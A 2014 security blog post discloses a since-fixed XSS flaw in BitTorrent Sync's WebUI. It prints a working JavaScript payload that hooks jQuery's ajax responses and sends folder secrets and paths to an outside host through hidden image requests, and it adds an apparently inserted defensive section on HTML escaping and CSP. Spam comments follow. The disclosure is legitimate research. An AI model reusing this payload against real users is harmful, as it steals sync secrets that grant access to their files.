Monday, December 29, 2014

BitTorrent Sync WebUI XSS vulnerability

BitTorrent Sync WebUI (<= 1.4.92) is affected by an XSS vulnerability that could be exploited in some rare scenarios.

Proof of concept video (stealing secrets):

The PoC exploit uses jQuery's global ajax hook (the jQuery library is already used by the WebUI) to fetch the necessary data (secrets in our case) directly from the internal ajax responses instead of parsing the DOM.

Sample payload:
var fakeImgUrl = 'http://cinu.pl/research/btsync/webui-xss/image/';
var folders = [];

// ajax hook - fires after every XHR the WebUI makes, so all data is there
$(document).ajaxComplete(function(event, xhr, settings) {
  try {
    var json = $.parseJSON(xhr.responseText);

    for (var i in json.folders) {
      var str = encodeURIComponent(json.folders[i].secret + ':' + json.folders[i].path + ':' + json.folders[i].status);

      // report each folder record only once
      if (folders.indexOf(str) == -1) {
        folders.push(str);
        $('body').append('<img style=\'display:none\' src=\'' + fakeImgUrl + '?' + str + '\'>');
        console.log('SEND ' + str);
      }
    }
  } catch (e) {
    // response was not JSON (or had no folders) - ignore it
    return;
  }
});
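The post does not say which WebUI field carried the injected markup, so the following added example (not BitTorrent Sync's code) assumes the usual case for a client-rendered sync UI: folder records from the internal JSON responses (the same secret, path and status fields the PoC reads) being concatenated into HTML. It places the unsafe rendering beside a version that escapes each value, so that markup inside a folder path reaches the page as text and no script of the kind above ever runs in the WebUI origin.

```javascript
// Added example (not BitTorrent Sync code). Field names follow the JSON the
// PoC above iterates over; the rendering functions themselves are assumed.

// Escape the five characters that let a value break out of an HTML text or
// attribute context.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Unsafe: attacker-influenced values are concatenated straight into markup.
// A folder path containing a tag becomes live DOM when the row is inserted,
// which is the foothold an in-page payload needs.
function renderFolderRowUnsafe(folder) {
  return '<tr><td>' + folder.path + '</td><td>' + folder.status + '</td></tr>';
}

// Hardened: every value is escaped before it touches markup. The secret is
// deliberately not rendered at all; it has no business being in the DOM.
function renderFolderRowSafe(folder) {
  return '<tr><td>' + escapeHtml(folder.path) + '</td><td>' +
         escapeHtml(folder.status) + '</td></tr>';
}

// Constructed sample record (not real data), in the shape the PoC reads.
const SAMPLE_FOLDER = {
  secret: 'EXAMPLE_SECRET_PLACEHOLDER',
  path: '/home/user/shared<script>alert(1)</script>',
  status: 'synced'
};

// Render the same record both ways so the difference can be inspected.
function demo() {
  return {
    unsafe: renderFolderRowUnsafe(SAMPLE_FOLDER),
    safe: renderFolderRowSafe(SAMPLE_FOLDER)
  };
}
```

A Content-Security-Policy that disallows inline scripts and restricts `img-src` to `'self'` would, independently of the escaping, also stop the hidden-image exfiltration the PoC relies on.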

I've also found a minor XSS on https://link.getsync.com/#f=XSS_HERE

Reported: 15.10.2014
Fixed: 16.10.2014
Unexpected surprise bounty: 500 USD

12 comments:

  1. When someone writes an article, he/she keeps the idea of a user in his/her brain, of how a user can understand it.
    That's why this paragraph is amazing. Thanks!
  2. Can you suggest a good hosting provider at an honest price?
    Kudos, I appreciate it!
  3. I’m going to inform my little brother that he
    should also pay a quick visit to this website on a regular basis to get updated with the latest news.
  4. I’ve read a few just-right things here. Definitely
    worth bookmarking for revisiting. I wonder how much effort you put into making such an excellent, informative
    website.
  5. My partner and I absolutely love your blog and find many of your posts
    to be just what I’m looking for. Do you offer
    guest writers the chance to write content for you? I wouldn’t mind composing a post or elaborating on most of the subjects you write about here.
    Again, awesome blog!
  6. Hi, I do think this is an excellent blog. I stumbled upon it. I may
    return yet again since I bookmarked it. Money
    and freedom are the greatest way to change; may you be rich and continue to help others.
  7. You ought to be a part of a contest for one of the best websites on the internet.
    I’m going to highly recommend this web site!
  8. I really like what you guys are up to. Such clever work and reporting!
    Keep up the very good work, guys. I’ve added you guys to my blogroll.
  9. First off I want to say fantastic blog! I had a quick question which
    I’d like to ask, if you don’t mind. I was curious to know how you
    center yourself and clear your head before writing.

    I have had a difficult time clearing my mind and getting
    my thoughts out there. I truly do enjoy writing; however, it just
    seems like the first 10 to 15 minutes are generally
    lost just trying to figure out how to begin. Any ideas or tips?

    Many thanks!